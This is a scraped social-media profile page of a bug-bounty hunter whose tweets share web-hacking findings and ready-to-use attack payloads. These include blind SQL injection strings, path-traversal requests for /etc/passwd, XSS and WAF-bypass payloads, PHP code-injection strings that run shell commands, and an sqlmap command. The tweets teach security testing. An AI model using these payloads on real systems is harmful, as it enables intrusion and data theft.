@nav1n0x

Followers: 23,039
Following: 238
Media: 533
Statuses: 2,324

DBA by day, hacker by night. Github:

Amsterdam, The Netherlands
Joined December 2010
Pinned Tweet
@nav1n0x
N$
3 months
I just Published - A Comprehensive Guide to Manually Hunting SQL Injection in MSSQL, MySQL, Oracle, and NoSQL (MongoDB) - I tried to explain everything I could. Let me know your opinion and suggestions, if any. I will keep updating the article whenever I
12
241
818
@nav1n0x
N$
2 years
Add "/_wpeprivate/config.json" to your fuzzing list. #BugBounty
40
307
1K
@nav1n0x
N$
3 years
Another good hunt tonight. Nginx merge slashes path traversal vulnerability in one of the popular tech giants. Payload: GET ///////../../../etc/passwd . #bugbountytips #BugBounty #infosec #LFI
42
329
1K
@nav1n0x
N$
2 years
SQL Injection on JSON body POST request. It took me some time, but finally found the right technique and injection point. ``sqlmap -r request.txt --level=5 --risk=3 --force-ssl --ignore-code=500 --dbs`` #SQLInjection #BugBounty
39
305
1K
@nav1n0x
N$
2 years
I was testing an app's #oauth2 today and randomly injected the payload "0'XOR(if(now()=sysdate(),sleep(6-2),0))XOR'Z", with php extension, and booom it was blind #SQLinjection ...wt**, never knew SQLi payloads can be sent using .php. #BugBounty #bugbountytips
22
270
1K
@nav1n0x
N$
25 days
I've been working on something cool for the past 2 weeks, will upload it to my GitHub soon...
27
78
1K
@nav1n0x
N$
6 months
Another day, another #SQLInjection . This time, it's in the User-Agent header, leading to a full database takeover. Keep testing SQLi on everything and everywhere... #SQL #SQLinjection #BugBounty .
21
135
966
@nav1n0x
N$
9 months
My first-ever SQL injection in Oracle: SQLMap couldn't find any exploits, but Ghauri was successful here. Using my same old tactic, scraped URLs using WBU and manually tested URLs older than 2-3 years. #BugBounty #SQLInjection #Oracle
63
131
948
@nav1n0x
N$
1 year
My new favorite SQLi finding methodology returning some great results... SQL Injection in `X-Forwarded-For:` header. #BugBounty
13
230
925
@nav1n0x
N$
3 months
This is the quickest RCE I've ever gotten. The app has a popup for multi-selection fields. I intercepted the request, expecting XSS or SQLi, but found that the parameter **_session_name= can be exploited to get an #RCE as a surprise. Payload: `&**='.print((`id`)).'` #BugBounty
28
165
950
@nav1n0x
N$
2 years
One more directory traversal done and dusted today. Payload: "//////////////////../../../../../../../../etc/passwd" #BugBounty
33
179
898
@nav1n0x
N$
1 year
I found 2 Blind time-based SQL Injections in X-Forwarded-For: header just using Burp Intruder. Made a list of 500+ HTTP requests and tested one by one for 3+ hours, here is the result.. X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z #BugBounty
25
238
898
@nav1n0x
N$
2 years
LFI in Laravel Framework. #BugBounty Payload: //////////////////../../../../../../../../etc/passwd
2
207
885
@nav1n0x
N$
2 years
If you have a JSON login page, test blind-SQL injection directly in the username and/or password fields like below. #BugBounty #SQLInjection #bugbountytips Payload injected in username input field:
30
254
892
@nav1n0x
N$
2 years
Bypassing WAF by adding multiple slashes to gain SSI/ Path traversal. This is my 2nd successful shot in the dark attempt. Payload: GET /assets/css///////../../../../../../../../etc/passwd #BugBounty
27
258
875
@nav1n0x
N$
1 year
Someone from Poland just got $200,000 bounty of lifetime from @Shopify 😲😲. #bugbounty
27
60
835
@nav1n0x
N$
5 months
Oh, noo.. not again! CVE-2024-24919 #CheckPoint #SSLVpn
19
121
846
@nav1n0x
N$
2 years
You guys always ask me how do I find SQL injections, it's just simple. Avoid what everyone does and make your own methodology. Here is mine: 1. I don't normally go if the target is just . I always prefer the target with wide scope. 1/n #BugBounty
1
323
771
@nav1n0x
N$
1 year
If you happen to find Symfony Web Framework that has Symfony profiler debug mode enabled, fuzz the following endpoints: - /app_dev.php - /app_dev.php/_profiler/phpinfo - /app_dev.php/_profiler - Look for "profiler token" in phpinfo() #BugBounty #bugbountytips
18
231
755
@nav1n0x
N$
3 months
Successfully done with early morning hunt - A directory traversal bug in a private Intigriti program. Payload: /****/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd #BugBounty
25
123
766
@nav1n0x
N$
8 months
#XSS in the .css url path?, yes.. here you go... #BugBounty Original url: "target/lib/css/animated.min.css" XSS Found in "/lib/css/animated.min'"/><script%20>alert(document.domain)<%2fscript>.css"
16
157
735
@nav1n0x
N$
1 year
This is one of the easiest RCEs I've ever found in my BB, let's hope this isn't a duplicate. Found an endpoint with `something.php?run=`, execute the encoded `%26echo%20`id`%24()%5C%20 ` in HTTP request, surprised to see when server returned ID. #BugBounty #RCE
27
170
716
@nav1n0x
N$
2 years
Again and again #Ghauri proving it's getting better in detecting #SQLinjection . I tested this target using SQLMAP over an hour but the result was negative, but Ghauri detected the injection point. @r0oth3x49 , great job man. 💪💪 #BugBounty
21
153
692
@nav1n0x
N$
10 months
This awesome 'FFuf Advanced Tricks' article by @noraj_rawsec needs a shoutout. I created my own FFuf script based on his tricks, and here is the result. #BugBounty
8
188
682
@nav1n0x
N$
2 years
Received single largest bounty of my bb journey. Thank you @Bugcrowd , this is the best good morning message I've ever received :) #BugBounty
76
20
669
@nav1n0x
N$
2 years
My 2nd RoR 'CVE-2019-5418' LFI in last 15 days. This is 3 years old bug and still exists... The page gives 404, but the buggy app is still in the server running. Add "Accept: ../../../../../../../../etc/passwd{{" to GET Request and read /etc/passwd #bugbountytips #BugBounty
20
189
672
@nav1n0x
N$
2 years
I fell in love with #Log4Shell again; 4 P1s in a row. It's a simple recon and understanding where to spray the payload. This tweet is for you haters who made fun of my recent Log4Shell post. #BugBounty
21
89
672
@nav1n0x
N$
6 months
I just added an extra property 'is-site-admin':true, and voilà, I became one of the site admins.🤣🤣🤣🤟🤟 #bugbounty
29
104
664
@nav1n0x
N$
1 year
Found an interesting #XSS where I inject the payload within the image file name and got the alert!. Payload: "12345-abc-1-23456<scr<script>ipt>alert(document.cookie)<%2Fscr<script>ipt>.img" 12345-abc-1-23456.img ==> Image name. #bugbountytip #BugBounty
15
187
653
@nav1n0x
N$
3 months
I recently found a cool #RCE /path traversal bug on a target in Intigriti. It was rejected because of OoS :( But I am proud that I found this cool bug through a full manual testing of the endpoint. This video just simplifies the steps, but I took hours to figure out. #BugBounty
29
98
659
@nav1n0x
N$
1 year
SQLi Tip - If you're able to find a JSON POST-based potential SQL injection (SQLi), remember to execute the SQLMAP query with -u and --data using JSON input. I've found more success using this method in SQLMap than when using a request file. #BugBounty #SQLi
9
129
624
@nav1n0x
N$
9 months
Accessing `env.json` through URL = 404 Not Found, replace URL with IP of origin server = 200 OK and loads of juicy info. #bugbounty
12
139
640
@nav1n0x
N$
2 years
Find an easy #XSS that is found all over the internet. Dork: inurl:"/irj/portal/" > visit the target, remove "/irj/portal/" from the url & add the payload in 2nd tweet. There are thousands of huge orgs with this #XSS , I reported > 150. Thank me later. #BugBountyTips #infosec
26
194
613
@nav1n0x
N$
2 years
So I finally wrote an article on Medium. This article is about my recent SQL Injection found in a mega retail outlet. How I got Owned A Multi-Billion Dollar Retailer’s MySQL Databases Using Simple SQL Injection - #BugBounty
37
185
597
@nav1n0x
N$
2 years
Another blind SQL injection using the same old payload "0"XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR"Z", this time on a support forum of a hosting company's reset password page. The response from the server was x2 per injected time.
17
188
600
@nav1n0x
N$
3 months
Found a cool SQL injection on the "terms & conditions" agree button parameter. While browsing with Burp Suite proxy, I found this parameter `terms_**`. I'd have missed this if I use any parameter scraper tool, so manual approach is always way to go. #BugBounty #SQLInjection
27
70
602
@nav1n0x
N$
5 months
LFI on the app root. #bugbounty
38
74
586
@nav1n0x
N$
2 years
Tricky ASP blind SQL Injection in a login page. Confirmed using Blind-boolean method, but it took me hours before I found the right payload - that needs to be encoded. Sadly, not triaged yet. Payload: `';%20waitfor%20delay%20'0:0:6'%20--%20` #BugBounty #bugbountytips #SQLinjection
16
175
576
@nav1n0x
N$
2 years
Found an SQLi using sysdate() based blind SQLi payload: 0'XOR(if(now()=sysdate(),sleep(20),0))XOR'Z #SqlInjection #SQLi #bugbountytips #BugBounty
21
184
574
@nav1n0x
N$
2 years
Found an unusual LFI today while working on a GOV target. The normal multi slash or encoded payload didn't work, so double encoded the payload and sent, boom - LFI. Payload: ".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd" #BugBounty #BugBountyTips
32
130
554
@nav1n0x
N$
4 months
A decade-old `ResolveUrl XSS` bug is still present in many apps. I randomly found this bug in a very famous app. 😂😂. Try in login pages, redirects, forms & dynamic URL construction (~/images/). Payload: /(A(%22onerror='alert%60123%60'test))/ #BugBounty
7
115
556
@nav1n0x
N$
10 months
'All-In-One Regex' by @h4x0r_dz for searching leaked keys and secrets is a must-have. Here is how I was able to find a P1 recently using BurpSuite, The leaked secrets allowed me to see some employee related juicy info. Link: #BugBounty
5
153
551
@nav1n0x
N$
1 year
Found this #xss payload that bypassed Cloudflare WAF. Not mine, but willing to give credit to the original author. I had to URL encode to get it to work btw. Payload: <Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))> #BugBounty
8
139
547
@nav1n0x
N$
9 months
Found this cool #RCE on a target; however, the triager marked it as out of scope due to a third-party tool. Tried to contact the 3rd party, no answer as usual.. `target[.com]/services/somthing.php?go=%26echo%20%60ls%20-la%60%24()%5C` #bugbounty
21
94
549
@nav1n0x
N$
2 years
Found an interesting blind SQL injection in a custom location search feature of a Private bbp. Interestingly the location coordinate search feature that uses a well known maps API is vulnerable to SQL injection, not sure if the app is buggy or the API. #BugBounty
6
105
532
@nav1n0x
N$
1 year
I found an SQL injection in the sales module admin panel of a major Telco. I reported it to them through their self-hosted bug tracking system. Let's see how they respond. They should consider it critical++ because of the PII that the vulnerability compromises. #BugBounty
25
62
518
@nav1n0x
N$
2 years
Blind #SQLInjection on #GraphQL The API accepts queries for user "gender" data and accepts 3 keywords "M,F,NA", I found the parameter "xxxkeyword_xx_xx" is vulnerable to blind-SQL injection attacks using my fav payload: "0\"XOR(if(now()=sysdate(),sleep(9),0))XOR\"Z", #BugBounty
16
168
518
@nav1n0x
N$
5 months
Cool Blind #SQLi . The target has an admin login page where certain methods are allowed. I found the API endpoint for the admin login and sent the same payload. Success. POST /admin/login ==> 405 POST /api/v01/admin/login ==> 200 OK + Blind SQLi #bugbounty #SQLi
18
74
514
@nav1n0x
N$
15 days
🚨 I found the coolest #SQLi on a target! Surprisingly, the SQLi was in the "ignore cookies" button of the cookie banner. As I always say and do, don’t just look for SQLis in parameters. Check uncommon places like cookie banners, cookie accept buttons, etc. #BugBounty
15
57
518
@nav1n0x
N$
2 years
Never forget to fuzz to see if /wp-content/debug.log is accessible publicly. Sometimes the logs can contain SQL errors which can be chained to #SQLinjection . See what I found here: #WPDebugLog #SQLi #BugBounty
20
147
504
@nav1n0x
N$
2 years
#SQLi in Ajax in a BugCrowd private program. The param "xxID=xx" used to fetch product details in a search box. Adding `%27` or `%22` returns "403 Forbidden", but bypassed using simply changing request to "POST" and Payload "if(now()=sysdate()%2Csleep(8)%2C0)" #BugBounty
14
151
501
@nav1n0x
N$
1 year
Found an old unused asp based client login page using #WayBackURLs , ran ffuf with @GodfatherOrwa 's aspx wordlist, found "forgotPassword.asp" page. Tried few known methods to reset pwd & ATOs, didn't work, then test the time-based blind #sqlinjection - success💥. #BugBounty #SQLi
20
94
481
@nav1n0x
N$
3 months
Use #ProxyChains to trick #WAF . I was working with @Jayesh25_ yesterday on an SQLi and had trouble with the WAF. However, by using ProxyChains, I successfully bypassed the WAF. Make sure you know how to configure it correctly and use good proxy lists. #bugbountytips #SQLi
15
68
488
@nav1n0x
N$
2 years
Another Tip: I found this VMWare vCenter #Log4Shell vulnerability in an endpoint using POST: /analytics/telemetry/ph/api/hyper/send?_c="${payload}". This RCE method actually of CVE-2021-22005, however this ep is vulnerable to Log4Shell as well. #BugBounty --> Bounty $2100.00.
15
112
470
@nav1n0x
N$
8 months
Use @Chocapikk_ CVE-2024-21887 exploit tool to get easy shell on vulnerable endpoints. #bugbounty
12
113
468
@nav1n0x
N$
6 months
ℹ️Sending payload within the URL/URI itself can also trigger SQL injection. So don't just focus on the parameters. #SQLInjection #BugBounty
11
93
470
@nav1n0x
N$
2 months
In Laravel, most devs disable debug mode and add custom errors to protect sensitive info if the app forcefully shows the debug, but I've found that using a different HTTP method (mostly PUT) can sometimes reveal debug info if the custom error page is present. #BugBounty
19
70
474
@nav1n0x
N$
8 months
Program fixed this vulnerability in like 4 hours after triage..but triage to bounty it took 22 days... 🧐🧐 #BugBounty ``/resources/app/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd``
16
79
464
@nav1n0x
N$
9 months
Do not forget to test 'Newsletter Signup' form for SQLi & stored XSS. This public bb target is on bc since 2022 & has different s/u forms for home page & internal pages, the internal one was vulnerable - probably not being maintained. #BugBounty #SQLi .
19
77
460
@nav1n0x
N$
2 years
"POST /xxxx/token.oauth2" in certain endpoints found to be vulnerable to #Log4Shell (CVE-2021-44228). Just replace the username with your payload. Check below 👇tweet to verify the vulnerability. #BugBounty
9
147
447
@nav1n0x
N$
3 months
Found another PHP Code Injection/RCE bug in the same program, but on a different domain. Luckily, the program didn't say "shared code". Payload: GET /?some_parameter='.print(`id`).'&_language=english&**another_parameter=1 HTTP/1.1 #BugBounty #PHP #RCE #CodeInjection
@nav1n0x
N$
3 months
This is the quickest RCE I've ever gotten. The app has a popup for multi-selection fields. I intercepted the request, expecting XSS or SQLi, but found that the parameter **_session_name= can be exploited to get an #RCE as a surprise. Payload: `&**='.print((`id`)).'` #BugBounty
28
165
950
5
72
441
@nav1n0x
N$
10 months
Two P3s after successfully bypassing the Cloudflare WAF on a private program. A simple SVG-based payload proved effective. Payload: "%3cSvg%20Only%3d1%20OnLoad%3dconfirm(1)%3e" #BugBounty
8
93
421
@nav1n0x
N$
3 years
Cloudflare #XSS WAF Bypass. Payload: "%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F It's an ongoing program, so I had to mask the URL. #bugbountytips #infosec #CloudflareWAF #WAFBypass
8
181
403
@nav1n0x
N$
2 years
Got 4 SQL injections Triaged and 1 new pending in HackerOne. This is the best ever I had in last one year. #BugBounty .
28
18
401
@nav1n0x
N$
5 months
You can still find SQL injections in User-Agent/ or other request-headers; you just need a keen eye to find it. Make sure to include SQLi testing on headers in your methodology. Developers often tend to ignore headers. #BugBounty #SQLi #SQLInjection
22
40
401
@nav1n0x
N$
4 years
#XSS in Sony Middle-East website. Found using lazy XSS payload (Polyglot payload): "jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onMouSeoVer=alert(1) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(100)//>\x3e " #BugBounty #BugHunter #bugbountytips
8
138
394
@nav1n0x
N$
2 years
My first-ever #RCE on PayPal is now triaged... What a great start to 2023 :) #BugBounty #HackerOne
14
18
387
@nav1n0x
N$
21 days
#Ghauri now supports bulk-scan using -m flag. Thanks @r0oth3x49 for this new update :)
4
31
401
@nav1n0x
N$
3 months
Check out my Bulk Path Traversal Scanner on GitHub! It's a simple tool with settings for batch size, delay, timeout, and retry attempts. It shows the successful url and auto-saves vulnerable endpoints to an external file with PoC. Feed it your list and go to sleep. #BugBounty
12
77
395
@nav1n0x
N$
1 year
When SQLMap forgot how to be SQLMap and starts finding XSS instead of SQLInjections ... 🤣🤣
24
34
371
@nav1n0x
N$
2 years
A XSS worth $1000. #BugBounty
16
19
368
@nav1n0x
N$
2 years
Thanks to #BugBounty and @Bugcrowd bought a 14 Pro Max without spending my salary ;). Fuzz hard, earn well...
21
10
363
@nav1n0x
N$
8 months
#BugBounty is not cheap; you must invest wisely to earn well. Tools, like good Internet, VPN, BurpSuite, BurpBounty, FoFA, Shodan, HackerGPT, ZoomEye, NetLas, etc., are essentials. If you don't invest in the right tools, you won't earn well. My internet usage the last 20 days.
21
48
369
@nav1n0x
N$
3 years
Here I found my first bug of 2022. "Grafana 8.3.0" #CVE202143798 Grafana Unauthorized arbitrary file reading vulnerability in a private invite. I used jas502n's exploit --> #bugbountytips #infosec
4
103
362
@nav1n0x
N$
8 months
Found a Critical today: Nacos auth bypass - using default JWT Secret. The Nuclei template I used can be found here: . #BugBounty
8
64
368
@nav1n0x
N$
7 months
Found a high-severity DOM-XSS using @KN0X55 . 1. Managed to find an obsolete link using WBU. 2. Scraped as many parameters as possible using ParamSpider. 3. Scanned the active endpoints using #KnoXSS , and here are the results. #BugBounty Bash Scanner code below👇+ Disclaimer
14
55
363
@nav1n0x
N$
6 months
Manual testing can be both fun and insightful, especially when you have an error like SQLSTATE[HY000] to guide you, it's a great way to sharpen your skills. Today I did a full manual testing using Burpsuite on a target and got it correct, it was fun.. #BugBounty #SQLi
21
46
363
@nav1n0x
N$
2 years
Found 2 SQLis from the same group of companies in a self-BBP. Initially I found this boolean injection like 5 days ago, but took some time to exploit it. Finally it's done and dusted today. Read the thread: #BugBounty #bugbountytips #SQLi #SQLInjection 1/3
12
77
358
@nav1n0x
N$
2 years
Found a first #SQLInjection of 2023 with full DB dump of 20k+ subscribers, unfortunately got duplicated 😌😌. Time based and UNION Query. Payloads used:👇 #BugBounty #SQLi
16
63
354
@nav1n0x
N$
1 year
I just published Exploiting SQL Error SQLSTATE[42000] To Own MariaDB #BugBounty #SQLInjection
15
109
359
@nav1n0x
N$
2 years
2 SQL injection reported for a program, 1 accepted so-far. Multi-part POST request, fed bSQLI payload in all fields, got 403, bypassed using a fake input: Content-Disposition: form-data; language="lang_id" with payload: if(now()=sysdate(),sleep(xx),0) ==>SUCCESS!! #BugBounty
19
95
353
@nav1n0x
N$
2 years
Scored 10/10 in CVSS today. Both SQL injections were full db + Server takeover using OS shell. #BugBounty
14
14
349
@nav1n0x
N$
1 year
I changed my job for a better opportunity & to stay with my family last month, so I didn't have time to engage in hacking. I only reported 1 bug last month as I was too busy with handovers. I started hacking again last week, and now, three crits in a row. #bugbounty .
20
16
331
@nav1n0x
N$
2 years
Cool directory traversal in a private target. The target has a SharePoint like privately built collaborative tool, where a non-admin user can edit pages to make limited amendments. 1/2 #BugBounty
19
41
334
@nav1n0x
N$
23 days
If you ever find a .1pux file, it is a 1Password backup file. While you can try renaming it to and extracting the contents, but know that these files are encrypted. Inside, you may find attachments along with other files, including one named
@IamRenganathan
Renganathan P
23 days
🥲💀🔥
1
3
49
2
44
345
@nav1n0x
N$
2 years
I found multiple instances of #Tableau CSP in the endpoint "/vizql/csp-report/" that are vulnerable to #Log4Shell (CVE-2021-44228). The response may depend on the targets - so test yourself. Here is the POST request if anyone wants to test: #BugBounty
5
72
332
@nav1n0x
N$
1 year
I found a blind time-based SQLi using an unused search query parameter. The target is based on a custom WP theme & the original theme link was found in the page source. I noticed certain params from the original theme were not used eg: `?recherche=` #BugBounty #SQLinjection 1/n
6
60
323
@nav1n0x
N$
8 months
Got my first CVE-2424-21887 - Ivanti code-injection report triaged, got 4 duplicates so far. #BugBounty
17
26
319
@nav1n0x
N$
2 years
What a day, 4 Critical in a row. 3 SQL injections and 1 DB credential disclosure. I sincerely hope the 3 SQL Injections are not dupes. #BugBounty #SQLInjection
15
18
311
@nav1n0x
N$
2 years
Found a strange SQL injection point in the "x-requested-with:" header using the payload "1 waitfor delay '0:0:5' --". However anything below 3 milli delay had no effect on the server and more than 10 milli delay was crashing the server and giving 503. #bugbountytips #BugBounty
7
80
317
@nav1n0x
N$
2 years
I found an exposed git repo in a bbp 2 weeks ago & got awarded 1.5K for that. Yesterday, curiously scanned the same subs using @pdnuclei 😍, to my surprise, I found an SVN repo containing db credentials and multiple source codes🙃🙃. #bugbounty #nuclei
9
28
312
@nav1n0x
N$
3 months
When looking for SQLi, don’t forget to test the mobile site (Ex: ). Developers might miss updates or WAF policies for these subdomains. I found a bug on . The program didn’t even remember this subdomain existed. #BugBounty
11
27
315
@nav1n0x
N$
2 years
Extremely happy for my October performance. 6 P1s 2 P3 and 1 P4 in Bug Crowd alone, 2 Log4Shell, 3 bSQLi and 1 critical info-disclose. #BugBounty .
11
23
310
@nav1n0x
N$
3 months
Found a DOM-XSS in a homepage of main target domain of a very old and open public program on Intigriti, and it has been triaged as well. I'm not sure how other hunters missed this...😉😉 #BugBounty Payload: target.xx/#'%22/onmouseover=alert(document.domain)//
9
45
312
@nav1n0x
N$
2 years
#CloudFlare #WAF bypassed using Rudolfo's ( @brutelogic ) method, thank you for this payload, senhor. Payload: <Svg Only=1 OnLoad=confirm(1)> #bugbountytips #WAFBypass
@BRuteLogic
Brute Logic
3 years
CloudFlare #WAF #XSS #Bypass <Svg Only=1 OnLoad=confirm(1)>
29
205
710
4
86
298
@nav1n0x
N$
11 months
🕵️‍♂️ P1 Finding of the day: While in wbu, spotted an '/ajax/' in an endpoint. Browsing returned a blank page, so going deep found 2020 archived URL with 2 parameters; still got a blank page. After some efforts crafted my own GET and POST HTTP request. #BugBounty #SQLi 1/n
5
54
296